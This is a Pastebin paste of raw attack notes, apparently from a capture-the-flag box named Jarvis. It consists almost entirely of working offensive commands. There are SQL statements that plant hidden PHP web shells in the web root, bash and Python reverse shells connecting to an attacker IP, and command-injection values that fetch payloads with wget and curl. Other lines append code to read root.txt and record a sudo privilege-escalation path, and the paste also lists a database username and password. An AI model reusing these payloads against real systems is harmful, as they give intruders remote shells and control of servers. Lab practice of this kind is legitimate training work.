Advertisement
Guest User

Untitled

a guest
Aug 24th, 2019
572
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.08 KB | None | 0 0
  1. MySQL
  2. user: DBadmin
  3. pass: imissyou
  4. database: hotel
  5.  
  6.  
  7.  
  8. /etc/apache2/sites-available/default-ssl.conf
  9. xxj31ZMTZzkVA
  10.  
  11.  
  12.  
  13. select '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.68/7979 0>&1\'"); ?>' INTO OUTFILE '/var/www/html/.shell3.php';
  14. select '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.68/8888 0>&1\'"); ?>' INTO OUTFILE '/var/www/html/.shell4.php';
  15.  
  16. <?php exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.68/8888 0>&1\'"); ?>
  17.  
  18. python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.68",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
  19.  
  20.  
  21. sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
  22.  
  23. $(wget http://10.10.14.68:9999/.pp.py)
  24. 10.10.10.143 $(curl http://10.10.10.143/.shell4.php)
  25.  
  26.  
  27. $(/bin/echo "os.system('\t/bin/cat /root/root.txt')" >> $(pwd)/simpler.py)
  28.  
  29.  
  30. User www-data may run the following commands on jarvis:
  31. (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
  32.  
  33.  
  34. /bin/sh
  35.  
  36.  
  37. service php7.0-fpm start
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement